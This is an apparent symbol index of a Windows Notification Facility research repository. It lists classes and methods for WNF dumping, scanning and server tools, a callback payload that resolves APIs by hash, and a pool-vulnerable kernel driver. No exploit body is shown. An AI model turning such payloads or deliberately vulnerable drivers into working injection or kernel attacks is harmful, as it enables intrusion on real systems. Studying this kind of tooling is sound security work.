type OptionType (line 121) | private enum OptionType
method AddArgument (line 135) | public void AddArgument(
method AddFlag (line 161) | public void AddFlag(
method AddParameter (line 193) | public void AddParameter(
method AddExclusive (line 227) | public void AddExclusive(List<string> exclusive)
method GetFlag (line 233) | public bool GetFlag(string key)
method GetHelp (line 254) | public void GetHelp()
method GetValue (line 302) | public string GetValue(string key)
method ListOptions (line 323) | public void ListOptions()
method Parse (line 380) | public string[] Parse(string[] args)
method SetOptionName (line 506) | public void SetOptionName(string optionName)
method SetTitle (line 512) | public void SetTitle(string title)
FILE: SharpWnfSuite/SharpWnfNameDumper/Handler/Execute.cs
class Execute (line 7) | internal class Execute
method Run (line 9) | public static void Run(CommandLineParser options)
FILE: SharpWnfSuite/SharpWnfNameDumper/Library/Header.cs
type SectionFlags (line 6) | [Flags]
type WNF_STATE_NAME_LIFETIME (line 48) | internal enum WNF_STATE_NAME_LIFETIME : uint
type WNF_DATA_SCOPE (line 57) | internal enum WNF_DATA_SCOPE : uint
type IMAGE_SECTION_HEADER (line 68) | [StructLayout(LayoutKind.Sequential, Pack = 1)]
type WNF_STATE_NAME (line 84) | internal struct WNF_STATE_NAME
method WNF_STATE_NAME (line 88) | public WNF_STATE_NAME(
method GetVersion (line 105) | public uint GetVersion()
method GetNameLifeTime (line 110) | public WNF_STATE_NAME_LIFETIME GetNameLifeTime()
method GetDataScope (line 115) | public WNF_DATA_SCOPE GetDataScope()
method GetPermanentData (line 120) | public uint GetPermanentData()
method GetSequenceNumber (line 125) | public uint GetSequenceNumber()
method GetOwnerTag (line 130) | public uint GetOwnerTag()
method SetVersion (line 135) | public void SetVersion(uint version)
method SetNameLifeTime (line 143) | public void SetNameLifeTime(WNF_STATE_NAME_LIFETIME nameLifeTime)
method SetDataScope (line 151) | public void SetDataScope(uint dataScope)
method SetPermanentData (line 159) | public void SetPermanentData(uint parmanentData)
method SetSequenceNumber (line 167) | public void SetSequenceNumber(uint sequenceNumber)
method SetOwnerTag (line 175) | public void SetOwnerTag(uint ownerTag)
method IsValid (line 183) | public bool IsValid()
FILE: SharpWnfSuite/SharpWnfNameDumper/Library/Helpers.cs
class Helpers (line 8) | internal class Helpers
method DumpWellKnownWnfNames (line 10) | public static bool DumpWellKnownWnfNames(
method GetImageBase (line 158) | public static long GetImageBase(IntPtr pImageBase)
method GetImagePointerSize (line 181) | public static int GetImagePointerSize(IntPtr pImageBase)
method GetSectionHeaders (line 206) | public static Dictionary<string, IMAGE_SECTION_HEADER> GetSectionHeade...
FILE: SharpWnfSuite/SharpWnfNameDumper/Library/Modules.cs
class Modules (line 10) | internal class Modules
method DumpWellKnownWnfNames (line 12) | public static bool DumpWellKnownWnfNames(
method DiffTables (line 43) | public static void DiffTables(
method PrintDiff (line 121) | public static void PrintDiff(
method WriteWnfNamesToFile (line 225) | public static void WriteWnfNamesToFile(
FILE: SharpWnfSuite/SharpWnfNameDumper/SharpWnfNameDumper.cs
class SharpWnfNameDumper (line 6) | internal class SharpWnfNameDumper
method Main (line 8) | static void Main(string[] args)
FILE: SharpWnfSuite/SharpWnfScan/Handler/CommandLineParser.cs
class CommandLineParser (line 7) | internal class CommandLineParser
class CommandLineOption (line 9) | private class CommandLineOption
method CommandLineOption (line 20) | public CommandLineOption(
method CommandLineOption (line 36) | public CommandLineOption(
method GetBriefName (line 57) | public string GetBriefName()
method GetDescription (line 62) | public string GetDescription()
method GetFlag (line 67) | public bool GetFlag()
method GetFullName (line 76) | public string GetFullName()
method GetIsParsed (line 81) | public bool GetIsParsed()
method GetIsRequired (line 86) | public bool GetIsRequired()
method GetOptionType (line 91) | public OptionType GetOptionType()
method GetValue (line 96) | public string GetValue()
method SetFlag (line 105) | public void SetFlag()
method SetIsParsed (line 110) | public void SetIsParsed()
method SetValue (line 115) | public void SetValue(string _value)
type OptionType (line 121) | private enum OptionType
method AddArgument (line 135) | public void AddArgument(
method AddFlag (line 161) | public void AddFlag(
method AddParameter (line 193) | public void AddParameter(
method AddExclusive (line 227) | public void AddExclusive(List<string> exclusive)
method GetFlag (line 233) | public bool GetFlag(string key)
method GetHelp (line 254) | public void GetHelp()
method GetValue (line 302) | public string GetValue(string key)
method ListOptions (line 323) | public void ListOptions()
method Parse (line 380) | public string[] Parse(string[] args)
method SetOptionName (line 506) | public void SetOptionName(string optionName)
method SetTitle (line 512) | public void SetTitle(string title)
FILE: SharpWnfSuite/SharpWnfScan/Handler/Execute.cs
class Execute (line 8) | internal class Execute
method Run (line 10) | public static void Run(CommandLineParser options)
FILE: SharpWnfSuite/SharpWnfScan/Interop/NativeMethods.cs
class NativeMethods (line 9) | internal class NativeMethods
method SymCleanup (line 14) | [DllImport("Dbghelp.dll", SetLastError = true)]
method SymFromAddr (line 17) | [DllImport("Dbghelp.dll", SetLastError = true)]
method SymSetOptions (line 24) | [DllImport("Dbghelp.dll", SetLastError = true)]
method SymInitialize (line 28) | [DllImport("Dbghelp.dll", SetLastError = true)]
method NtAdjustPrivilegesToken (line 41) | [DllImport("ntdll.dll")]
method NtClose (line 50) | [DllImport("ntdll.dll")]
method NtOpenKey (line 53) | [DllImport("ntdll.dll")]
method NtOpenProcess (line 59) | [DllImport("ntdll.dll")]
method NtOpenSymbolicLinkObject (line 66) | [DllImport("ntdll.dll")]
method NtQueryInformationProcess (line 72) | [DllImport("ntdll.dll")]
method NtQuerySymbolicLinkObject (line 80) | [DllImport("ntdll.dll")]
method NtQueryValueKey (line 86) | [DllImport("ntdll.dll")]
method NtQueryVirtualMemory (line 95) | [DllImport("ntdll.dll")]
method NtReadVirtualMemory (line 104) | [DllImport("ntdll.dll")]
FILE: SharpWnfSuite/SharpWnfScan/Interop/WellKnownStateName1507.cs
type WELL_KNOWN_WNF_NAME_1507 (line 3) | internal enum WELL_KNOWN_WNF_NAME_1507 : ulong
FILE: SharpWnfSuite/SharpWnfScan/Interop/WellKnownStateName1511.cs
type WELL_KNOWN_WNF_NAME_1511 (line 3) | internal enum WELL_KNOWN_WNF_NAME_1511 : ulong
FILE: SharpWnfSuite/SharpWnfScan/Interop/WellKnownStateName1607.cs
type WELL_KNOWN_WNF_NAME_1607 (line 3) | internal enum WELL_KNOWN_WNF_NAME_1607 : ulong
FILE: SharpWnfSuite/SharpWnfScan/Interop/WellKnownStateName1703.cs
type WELL_KNOWN_WNF_NAME_1703 (line 3) | internal enum WELL_KNOWN_WNF_NAME_1703 : ulong
FILE: SharpWnfSuite/SharpWnfScan/Interop/WellKnownStateName1709.cs
type WELL_KNOWN_WNF_NAME_1709 (line 3) | internal enum WELL_KNOWN_WNF_NAME_1709 : ulong
FILE: SharpWnfSuite/SharpWnfScan/Interop/WellKnownStateName1803.cs
type WELL_KNOWN_WNF_NAME_1803 (line 3) | internal enum WELL_KNOWN_WNF_NAME_1803 : ulong
FILE: SharpWnfSuite/SharpWnfScan/Interop/WellKnownStateName1809.cs
type WELL_KNOWN_WNF_NAME_1809 (line 3) | internal enum WELL_KNOWN_WNF_NAME_1809 : ulong
FILE: SharpWnfSuite/SharpWnfScan/Interop/WellKnownStateName1903To1909.cs
type WELL_KNOWN_WNF_NAME_1903_TO_1909 (line 3) | internal enum WELL_KNOWN_WNF_NAME_1903_TO_1909 : ulong
FILE: SharpWnfSuite/SharpWnfScan/Interop/WellKnownStateName2004To21H1.cs
type WELL_KNOWN_WNF_NAME_2004_TO_21H1 (line 3) | internal enum WELL_KNOWN_WNF_NAME_2004_TO_21H1 : ulong
FILE: SharpWnfSuite/SharpWnfScan/Interop/WellKnownStateName2022.cs
type WELL_KNOWN_WNF_NAME_2022 (line 3) | internal enum WELL_KNOWN_WNF_NAME_2022 : ulong
FILE: SharpWnfSuite/SharpWnfScan/Interop/WellKnownStateName21H2.cs
type WELL_KNOWN_WNF_NAME_21H2 (line 3) | internal enum WELL_KNOWN_WNF_NAME_21H2 : ulong
FILE: SharpWnfSuite/SharpWnfScan/Interop/WellKnownStateName22H2.cs
type WELL_KNOWN_WNF_NAME_22H2 (line 3) | internal enum WELL_KNOWN_WNF_NAME_22H2 : ulong
FILE: SharpWnfSuite/SharpWnfScan/Interop/WellKnownStateName23H2.cs
type WELL_KNOWN_WNF_NAME_23H2 (line 3) | internal enum WELL_KNOWN_WNF_NAME_23H2 : ulong
FILE: SharpWnfSuite/SharpWnfScan/Interop/WellKnownStateName24H2.cs
type WELL_KNOWN_WNF_NAME_24H2 (line 3) | internal enum WELL_KNOWN_WNF_NAME_24H2 : ulong
FILE: SharpWnfSuite/SharpWnfScan/Interop/Win32Consts.cs
class Win32Consts (line 7) | internal class Win32Consts
FILE: SharpWnfSuite/SharpWnfScan/Interop/Win32Delegates.cs
class Win32Delegates (line 6) | internal class Win32Delegates
FILE: SharpWnfSuite/SharpWnfScan/Interop/Win32Enums.cs
type ACCESS_MASK (line 5) | [Flags]
type BOOLEAN (line 60) | internal enum BOOLEAN : byte
type IMAGE_FILE_MACHINE (line 66) | internal enum IMAGE_FILE_MACHINE : ushort
type KEY_VALUE_INFORMATION_CLASS (line 102) | internal enum KEY_VALUE_INFORMATION_CLASS
type MEMORY_ALLOCATION_TYPE (line 113) | [Flags]
type MEMORY_INFORMATION_CLASS (line 138) | internal enum MEMORY_INFORMATION_CLASS
type MEMORY_PROTECTION (line 157) | [Flags]
type OBJECT_ATTRIBUTES_FLAGS (line 174) | [Flags]
type PrivilegeAttributeFlags (line 194) | [Flags]
type PROCESSINFOCLASS (line 202) | internal enum PROCESSINFOCLASS
type REG_VALUE_TYPE (line 319) | internal enum REG_VALUE_TYPE
type SectionFlags (line 335) | [Flags]
type SYM_OPTIONS (line 377) | [Flags]
type WNF_STATE_NAME_LIFETIME (line 408) | internal enum WNF_STATE_NAME_LIFETIME : uint
type WNF_DATA_SCOPE (line 417) | internal enum WNF_DATA_SCOPE : uint
FILE: SharpWnfSuite/SharpWnfScan/Interop/Win32Structs.cs
type CLIENT_ID (line 10) | [StructLayout(LayoutKind.Sequential)]
type IMAGE_SECTION_HEADER (line 17) | [StructLayout(LayoutKind.Sequential, Pack = 1)]
type KEY_VALUE_FULL_INFORMATION (line 33) | [StructLayout(LayoutKind.Sequential)]
type LIST_ENTRY32 (line 45) | [StructLayout(LayoutKind.Sequential)]
type LIST_ENTRY64 (line 52) | [StructLayout(LayoutKind.Sequential)]
type LUID (line 59) | [StructLayout(LayoutKind.Sequential)]
method LUID (line 65) | public LUID(uint _lowPart, uint _highPart)
type LUID_AND_ATTRIBUTES (line 72) | [StructLayout(LayoutKind.Sequential, Pack = 4)]
type MEMORY_BASIC_INFORMATION (line 79) | [StructLayout(LayoutKind.Sequential)]
type OBJECT_ATTRIBUTES (line 91) | [StructLayout(LayoutKind.Sequential)]
method OBJECT_ATTRIBUTES (line 101) | public OBJECT_ATTRIBUTES(
method Dispose (line 133) | public void Dispose()
type PROCESS_BASIC_INFORMATION (line 144) | [StructLayout(LayoutKind.Sequential)]
type PROCESS_DEVICEMAP_INFORMATION (line 155) | [StructLayout(LayoutKind.Sequential)]
type RTL_BALANCED_NODE32 (line 163) | [StructLayout(LayoutKind.Sequential)]
type RTL_BALANCED_NODE64 (line 171) | [StructLayout(LayoutKind.Sequential)]
type RTL_RB_TREE32 (line 179) | [StructLayout(LayoutKind.Sequential)]
type RTL_RB_TREE64 (line 186) | [StructLayout(LayoutKind.Sequential)]
type SYMBOL_INFO (line 193) | [StructLayout(LayoutKind.Sequential)]
type TOKEN_PRIVILEGES (line 215) | [StructLayout(LayoutKind.Sequential)]
method TOKEN_PRIVILEGES (line 222) | public TOKEN_PRIVILEGES(int _privilegeCount)
type UNICODE_STRING (line 229) | [StructLayout(LayoutKind.Sequential)]
method UNICODE_STRING (line 236) | public UNICODE_STRING(string s)
method Dispose (line 258) | public void Dispose()
method ToString (line 264) | public override string ToString()
method GetBuffer (line 272) | public IntPtr GetBuffer()
method SetBuffer (line 277) | public void SetBuffer(IntPtr _buffer)
type WNF_CONTEXT_HEADER (line 283) | [StructLayout(LayoutKind.Sequential)]
type WNF_DELIVERY_DESCRIPTOR (line 290) | [StructLayout(LayoutKind.Sequential)]
type WNF_NAME_SUBSCRIPTION32 (line 302) | [StructLayout(LayoutKind.Sequential)]
type WNF_NAME_SUBSCRIPTION32_WIN11 (line 321) | [StructLayout(LayoutKind.Sequential)]
type WNF_NAME_SUBSCRIPTION64 (line 340) | [StructLayout(LayoutKind.Sequential)]
type WNF_NAME_SUBSCRIPTION64_WIN11 (line 359) | [StructLayout(LayoutKind.Sequential)]
type WNF_SERIALIZATION_GROUP32 (line 378) | [StructLayout(LayoutKind.Sequential)]
type WNF_SERIALIZATION_GROUP64 (line 388) | [StructLayout(LayoutKind.Sequential)]
type WNF_STATE_NAME (line 398) | [StructLayout(LayoutKind.Sequential)]
method WNF_STATE_NAME (line 403) | public WNF_STATE_NAME(
method GetVersion (line 420) | public uint GetVersion()
method GetNameLifeTime (line 425) | public WNF_STATE_NAME_LIFETIME GetNameLifeTime()
method GetDataScope (line 430) | public WNF_DATA_SCOPE GetDataScope()
method GetPermanentData (line 435) | public uint GetPermanentData()
method GetSequenceNumber (line 440) | public uint GetSequenceNumber()
method GetOwnerTag (line 445) | public uint GetOwnerTag()
method SetVersion (line 450) | public void SetVersion(uint version)
method SetNameLifeTime (line 458) | public void SetNameLifeTime(WNF_STATE_NAME_LIFETIME nameLifeTime)
method SetDataScope (line 466) | public void SetDataScope(uint dataScope)
method SetPermanentData (line 474) | public void SetPermanentData(uint parmanentData)
method SetSequenceNumber (line 482) | public void SetSequenceNumber(uint sequenceNumber)
method SetOwnerTag (line 490) | public void SetOwnerTag(uint ownerTag)
method IsValid (line 498) | public bool IsValid()
type WNF_SUBSCRIPTION_TABLE32 (line 507) | [StructLayout(LayoutKind.Sequential)]
type WNF_SUBSCRIPTION_TABLE32_WIN11 (line 524) | [StructLayout(LayoutKind.Sequential)]
type WNF_SUBSCRIPTION_TABLE64 (line 541) | [StructLayout(LayoutKind.Sequential)]
type WNF_SUBSCRIPTION_TABLE64_WIN11 (line 558) | [StructLayout(LayoutKind.Sequential)]
type WNF_SUBSCRIPTION_TABLE64_WIN11_24H2 (line 575) | [StructLayout(LayoutKind.Sequential)]
type WNF_USER_SUBSCRIPTION32 (line 592) | [StructLayout(LayoutKind.Sequential)]
type WNF_USER_SUBSCRIPTION64 (line 610) | [StructLayout(LayoutKind.Sequential)]
type WNF_TYPE_ID (line 628) | [StructLayout(LayoutKind.Sequential)]
FILE: SharpWnfSuite/SharpWnfScan/Library/Globals.cs
class Globals (line 5) | internal class Globals
method Globals (line 16) | static Globals()
FILE: SharpWnfSuite/SharpWnfScan/Library/Header.cs
type WNF_USER_SUBSCRIPTION_INFO (line 6) | [StructLayout(LayoutKind.Sequential)]
FILE: SharpWnfSuite/SharpWnfScan/Library/Helpers.cs
class Helpers (line 14) | internal class Helpers
method GetDeviceMap (line 16) | public static Dictionary<string, string> GetDeviceMap()
method GetMemorySymbols (line 85) | public static Dictionary<IntPtr, string> GetMemorySymbols(IntPtr hProc...
method GetOsVersionNumbers (line 156) | public static bool GetOsVersionNumbers(out int nMajorVersion, out int ...
method GetOsVersionString (line 256) | public static string GetOsVersionString(int nMajorVersion, int nMinorV...
method GetPebBase (line 317) | public static IntPtr GetPebBase(IntPtr hProcess, out IntPtr pPebWow32)
method GetProcessArchitecture (line 357) | public static IMAGE_FILE_MACHINE GetProcessArchitecture(IntPtr hProcess)
method GetProcessImageFileName (line 438) | public static string GetProcessImageFileName(IntPtr hProcess)
method GetProcessModules (line 479) | public static Dictionary<string, IntPtr> GetProcessModules(
method GetModuleSectionHeaders (line 640) | public static Dictionary<string, IMAGE_SECTION_HEADER> GetModuleSectio...
method GetWellKnownWnfName (line 736) | public static string GetWellKnownWnfName(ulong stateName)
method GetWnfStateName (line 800) | public static ulong GetWnfStateName(string name)
method Is32BitProcess (line 863) | public static bool Is32BitProcess(IntPtr hProcess)
method IsHeapAddress (line 887) | public static bool IsHeapAddress(IntPtr hProcess, IntPtr pBuffer)
FILE: SharpWnfSuite/SharpWnfScan/Library/Modules.cs
class Modules (line 12) | internal class Modules
method DumpAllWnfSubscriptionInformation (line 14) | public static void DumpAllWnfSubscriptionInformation(ulong stateName, ...
method DumpWnfSubscriptionInformation (line 23) | public static void DumpWnfSubscriptionInformation(
method DumpWnfSubscriptionInformationByName (line 176) | public static void DumpWnfSubscriptionInformationByName(
method ListStateNames (line 195) | public static void ListStateNames(ulong stateNameFilter, bool bVerbose)
FILE: SharpWnfSuite/SharpWnfScan/Library/Utilities.cs
class Utilities (line 11) | internal class Utilities
method EnableDebugPrivilege (line 13) | public static bool EnableDebugPrivilege()
method GetNameSubscriptions (line 36) | public static Dictionary<ulong, IntPtr> GetNameSubscriptions(
method GetNameSubscriptionsWin11 (line 138) | public static Dictionary<ulong, IntPtr> GetNameSubscriptionsWin11(
method GetSubscriptionTable (line 199) | public static IntPtr GetSubscriptionTable(IntPtr hProcess, IntPtr pTab...
method GetSubscriptionTablePointerAddress (line 272) | public static IntPtr GetSubscriptionTablePointerAddress(IntPtr hProcess)
method GetUserSubscriptions (line 393) | public static Dictionary<IntPtr, KeyValuePair<IntPtr, IntPtr>> GetUser...
method ListWin11NameSubscriptions (line 541) | public static void ListWin11NameSubscriptions(
FILE: SharpWnfSuite/SharpWnfScan/SharpWnfScan.cs
class SharpWnfScan (line 7) | internal class SharpWnfScan
method Main (line 9) | static void Main(string[] args)
FILE: SharpWnfSuite/SharpWnfServer/Handler/CommandLineParser.cs
class CommandLineParser (line 7) | internal class CommandLineParser
class CommandLineOption (line 9) | private class CommandLineOption
method CommandLineOption (line 20) | public CommandLineOption(
method CommandLineOption (line 36) | public CommandLineOption(
method GetBriefName (line 57) | public string GetBriefName()
method GetDescription (line 62) | public string GetDescription()
method GetFlag (line 67) | public bool GetFlag()
method GetFullName (line 76) | public string GetFullName()
method GetIsParsed (line 81) | public bool GetIsParsed()
method GetIsRequired (line 86) | public bool GetIsRequired()
method GetOptionType (line 91) | public OptionType GetOptionType()
method GetValue (line 96) | public string GetValue()
method SetFlag (line 105) | public void SetFlag()
method SetIsParsed (line 110) | public void SetIsParsed()
method SetValue (line 115) | public void SetValue(string _value)
type OptionType (line 121) | private enum OptionType
method AddArgument (line 135) | public void AddArgument(
method AddFlag (line 161) | public void AddFlag(
method AddParameter (line 193) | public void AddParameter(
method AddExclusive (line 227) | public void AddExclusive(List<string> exclusive)
method GetFlag (line 233) | public bool GetFlag(string key)
method GetHelp (line 254) | public void GetHelp()
method GetValue (line 302) | public string GetValue(string key)
method ListOptions (line 323) | public void ListOptions()
method Parse (line 380) | public string[] Parse(string[] args)
method SetOptionName (line 506) | public void SetOptionName(string optionName)
method SetTitle (line 512) | public void SetTitle(string title)
FILE: SharpWnfSuite/SharpWnfServer/Handler/Execute.cs
class Execute (line 7) | internal class Execute
method Run (line 9) | public static void Run(CommandLineParser options)
FILE: SharpWnfSuite/SharpWnfServer/Interop/NativeMethods.cs
class NativeMethods (line 8) | internal class NativeMethods
method NtClose (line 10) | [DllImport("ntdll.dll")]
method NtCreateEvent (line 13) | [DllImport("ntdll.dll")]
method NtCreateWnfStateName (line 21) | [DllImport("ntdll.dll")]
method NtOpenKey (line 31) | [DllImport("ntdll.dll")]
method NtQueryValueKey (line 37) | [DllImport("ntdll.dll")]
method NtQueryWnfStateData (line 46) | [DllImport("ntdll.dll")]
method NtUpdateWnfStateData (line 55) | [DllImport("ntdll.dll")]
method NtWaitForSingleObject (line 65) | [DllImport("ntdll.dll")]
method RtlSubscribeWnfStateChangeNotification (line 71) | [DllImport("ntdll.dll")]
method RtlUnsubscribeWnfStateChangeNotification (line 82) | [DllImport("ntdll.dll")]
FILE: SharpWnfSuite/SharpWnfServer/Interop/WellKnownStateName1507.cs
type WELL_KNOWN_WNF_NAME_1507 (line 3) | internal enum WELL_KNOWN_WNF_NAME_1507 : ulong
FILE: SharpWnfSuite/SharpWnfServer/Interop/WellKnownStateName1511.cs
type WELL_KNOWN_WNF_NAME_1511 (line 3) | internal enum WELL_KNOWN_WNF_NAME_1511 : ulong
FILE: SharpWnfSuite/SharpWnfServer/Interop/WellKnownStateName1607.cs
type WELL_KNOWN_WNF_NAME_1607 (line 3) | internal enum WELL_KNOWN_WNF_NAME_1607 : ulong
FILE: SharpWnfSuite/SharpWnfServer/Interop/WellKnownStateName1703.cs
type WELL_KNOWN_WNF_NAME_1703 (line 3) | internal enum WELL_KNOWN_WNF_NAME_1703 : ulong
FILE: SharpWnfSuite/SharpWnfServer/Interop/WellKnownStateName1709.cs
type WELL_KNOWN_WNF_NAME_1709 (line 3) | internal enum WELL_KNOWN_WNF_NAME_1709 : ulong
FILE: SharpWnfSuite/SharpWnfServer/Interop/WellKnownStateName1803.cs
type WELL_KNOWN_WNF_NAME_1803 (line 3) | internal enum WELL_KNOWN_WNF_NAME_1803 : ulong
FILE: SharpWnfSuite/SharpWnfServer/Interop/WellKnownStateName1809.cs
type WELL_KNOWN_WNF_NAME_1809 (line 3) | internal enum WELL_KNOWN_WNF_NAME_1809 : ulong
FILE: SharpWnfSuite/SharpWnfServer/Interop/WellKnownStateName1903To1909.cs
type WELL_KNOWN_WNF_NAME_1903_TO_1909 (line 3) | internal enum WELL_KNOWN_WNF_NAME_1903_TO_1909 : ulong
FILE: SharpWnfSuite/SharpWnfServer/Interop/WellKnownStateName2004To21H1.cs
type WELL_KNOWN_WNF_NAME_2004_TO_21H1 (line 3) | internal enum WELL_KNOWN_WNF_NAME_2004_TO_21H1 : ulong
FILE: SharpWnfSuite/SharpWnfServer/Interop/WellKnownStateName2022.cs
type WELL_KNOWN_WNF_NAME_2022 (line 3) | internal enum WELL_KNOWN_WNF_NAME_2022 : ulong
FILE: SharpWnfSuite/SharpWnfServer/Interop/WellKnownStateName21H2.cs
type WELL_KNOWN_WNF_NAME_21H2 (line 3) | internal enum WELL_KNOWN_WNF_NAME_21H2 : ulong
FILE: SharpWnfSuite/SharpWnfServer/Interop/WellKnownStateName22H2.cs
type WELL_KNOWN_WNF_NAME_22H2 (line 3) | internal enum WELL_KNOWN_WNF_NAME_22H2 : ulong
FILE: SharpWnfSuite/SharpWnfServer/Interop/WellKnownStateName23H2.cs
type WELL_KNOWN_WNF_NAME_23H2 (line 3) | internal enum WELL_KNOWN_WNF_NAME_23H2 : ulong
FILE: SharpWnfSuite/SharpWnfServer/Interop/WellKnownStateName24H2.cs
type WELL_KNOWN_WNF_NAME_24H2 (line 3) | internal enum WELL_KNOWN_WNF_NAME_24H2 : ulong
FILE: SharpWnfSuite/SharpWnfServer/Interop/Win32Consts.cs
class Win32Consts (line 7) | internal class Win32Consts
FILE: SharpWnfSuite/SharpWnfServer/Interop/Win32Enums.cs
type ACCESS_MASK (line 5) | [Flags]
type ACE_FLAGS (line 42) | [Flags]
type ACE_TYPE (line 55) | internal enum ACE_TYPE : byte
type ACL_REVISION (line 82) | internal enum ACL_REVISION : byte
type BOOLEAN (line 88) | internal enum BOOLEAN : byte
type EVENT_TYPE (line 94) | internal enum EVENT_TYPE
type KEY_VALUE_INFORMATION_CLASS (line 100) | internal enum KEY_VALUE_INFORMATION_CLASS
type OBJECT_ATTRIBUTES_FLAGS (line 111) | [Flags]
type REG_VALUE_TYPE (line 131) | internal enum REG_VALUE_TYPE
type SECURITY_DESCRIPTOR_CONTROL (line 147) | [Flags]
type WNF_DATA_SCOPE (line 167) | internal enum WNF_DATA_SCOPE : uint
type WNF_STATE_NAME_LIFETIME (line 178) | internal enum WNF_STATE_NAME_LIFETIME : uint
FILE: SharpWnfSuite/SharpWnfServer/Interop/Win32Structs.cs
type ACCESS_ALLOWED_ACE (line 7) | [StructLayout(LayoutKind.Sequential)]
type ACE_HEADER (line 15) | [StructLayout(LayoutKind.Sequential)]
type ACL (line 23) | [StructLayout(LayoutKind.Sequential)]
type KEY_VALUE_FULL_INFORMATION (line 33) | [StructLayout(LayoutKind.Sequential)]
type LARGE_INTEGER (line 45) | [StructLayout(LayoutKind.Explicit, Size = 8)]
method LARGE_INTEGER (line 55) | public LARGE_INTEGER(int _low, int _high)
method LARGE_INTEGER (line 62) | public LARGE_INTEGER(long _quad)
method ToInt64 (line 69) | public long ToInt64()
method FromInt64 (line 74) | public static LARGE_INTEGER FromInt64(long value)
type OBJECT_ATTRIBUTES (line 84) | [StructLayout(LayoutKind.Sequential)]
method OBJECT_ATTRIBUTES (line 94) | public OBJECT_ATTRIBUTES(
method Dispose (line 126) | public void Dispose()
type SECURITY_DESCRIPTOR (line 137) | [StructLayout(LayoutKind.Sequential)]
type UNICODE_STRING (line 149) | [StructLayout(LayoutKind.Sequential)]
method UNICODE_STRING (line 156) | public UNICODE_STRING(string s)
method Dispose (line 178) | public void Dispose()
method ToString (line 184) | public override string ToString()
method GetBuffer (line 189) | public IntPtr GetBuffer()
method SetBuffer (line 194) | public void SetBuffer(IntPtr _buffer)
type WNF_STATE_NAME (line 200) | [StructLayout(LayoutKind.Sequential)]
method WNF_STATE_NAME (line 205) | public WNF_STATE_NAME(
method GetVersion (line 222) | public uint GetVersion()
method GetNameLifeTime (line 227) | public WNF_STATE_NAME_LIFETIME GetNameLifeTime()
method GetDataScope (line 232) | public WNF_DATA_SCOPE GetDataScope()
method GetPermanentData (line 237) | public uint GetPermanentData()
method GetSequenceNumber (line 242) | public uint GetSequenceNumber()
method GetOwnerTag (line 247) | public uint GetOwnerTag()
method SetVersion (line 252) | public void SetVersion(uint version)
method SetNameLifeTime (line 260) | public void SetNameLifeTime(WNF_STATE_NAME_LIFETIME nameLifeTime)
method SetDataScope (line 268) | public void SetDataScope(uint dataScope)
method SetPermanentData (line 276) | public void SetPermanentData(uint parmanentData)
method SetSequenceNumber (line 284) | public void SetSequenceNumber(uint sequenceNumber)
method SetOwnerTag (line 292) | public void SetOwnerTag(uint ownerTag)
method IsValid (line 300) | public bool IsValid()
FILE: SharpWnfSuite/SharpWnfServer/Library/HexDump.cs
class HexDump (line 7) | internal class HexDump
method Dump (line 9) | public static string Dump(byte[] data, int nIndentCount)
method Dump (line 22) | public static string Dump(byte[] data, uint nRange, int nIndentCount)
method Dump (line 35) | public static string Dump(byte[] data, IntPtr pBaseAddress, uint nRang...
method Dump (line 48) | public static string Dump(IntPtr pBufferToRead, uint nRange, int nInde...
method Dump (line 54) | public static string Dump(IntPtr pBufferToRead, IntPtr pBaseAddress, u...
method IsPrintable (line 112) | private static bool IsPrintable(char code)
FILE: SharpWnfSuite/SharpWnfServer/Library/WnfCom.cs
class WnfCom (line 11) | internal class WnfCom : IDisposable
type NotifyContext (line 16) | private struct NotifyContext
method WnfCom (line 47) | public WnfCom()
method Dispose (line 69) | public void Dispose() { }
method CreateServer (line 74) | public ulong CreateServer()
method Listen (line 101) | public bool Listen()
method PrintInternalName (line 172) | public void PrintInternalName()
method Read (line 191) | public bool Read(out int nChangeStamp, out IntPtr pInfoBuffer, out uin...
method Write (line 233) | public bool Write(byte[] data)
method SetStateName (line 263) | public bool SetStateName(string stateName)
method GetOsVersionNumbers (line 273) | private static bool GetOsVersionNumbers(out int nMajorVersion, out int...
method GetOsVersionString (line 373) | private static string GetOsVersionString(int nMajorVersion, int nMinor...
method GetWnfStateName (line 434) | private ulong GetWnfStateName(string name)
method GetWorldAllowedSecurityDescriptor (line 498) | private IntPtr GetWorldAllowedSecurityDescriptor()
method NotifyCallback (line 554) | private int NotifyCallback(
FILE: SharpWnfSuite/SharpWnfServer/SharpWnfServer.cs
class SharpWnfServer (line 6) | internal class SharpWnfServer
method Main (line 8) | static void Main(string[] args)
FILE: WnfCallbackPayload/WnfCallbackPayload/WnfCallbackPayload.c
type WNF_STATE_NAME (line 9) | typedef struct _WNF_STATE_NAME
type ULONG (line 14) | typedef ULONG WNF_CHANGE_STAMP, * PWNF_CHANGE_STAMP;
type WNF_TYPE_ID (line 16) | typedef struct _WNF_TYPE_ID
function DWORD (line 34) | DWORD CalcAnsiStringHash(ULONG_PTR pAnsiString)
function DWORD (line 54) | DWORD CalcUnicodeStringHash(PUNICODE_STRING pUnicodeString)
function ULONG_PTR (line 72) | ULONG_PTR GetModuleHandleByHash(DWORD moduleHash)
function ULONG_PTR (line 112) | ULONG_PTR GetProcAddressByHash(ULONG_PTR hModule, DWORD procHash)
function NTSTATUS (line 141) | NTSTATUS NTAPI WnfCallback(
Condensed preview — 169 files, each showing path, character count, and a content snippet. Download the .json file or copy for the full structured content (5,693K chars).
[
{
"path": ".gitignore",
"chars": 53,
"preview": ".DS_Store\nbin/\nobj/\n.vs/\nx64/\nARM64/\nDebug/\nRelease/\n"
},
{
"path": "KernelPrimitive/PoolVulnDrv/PoolVulnDrv/PoolVulnDrv.cpp",
"chars": 4883,
"preview": "#include <ntddk.h>\n#include \"PoolVulnDrv.h\"\n\nPVOID g_PoolPointer = nullptr;\n\nvoid PoolVulnDrvUnload(_In_ PDRIVER_OBJECT "
},
{
"path": "KernelPrimitive/PoolVulnDrv/PoolVulnDrv/PoolVulnDrv.h",
"chars": 628,
"preview": "#pragma once\n#pragma warning(disable : 4996)\n\n#define POOLVULNDRV_DEVICE 0xdead\n#define VULN_POOL_TAG 'daed'\n\n// 0xDEAD2"
},
{
"path": "KernelPrimitive/PoolVulnDrv/PoolVulnDrv/PoolVulnDrv.vcxproj",
"chars": 7713,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project DefaultTargets=\"Build\" ToolsVersion=\"12.0\" xmlns=\"http://schemas.micros"
},
{
"path": "KernelPrimitive/PoolVulnDrv/PoolVulnDrv/PoolVulnDrv.vcxproj.filters",
"chars": 1242,
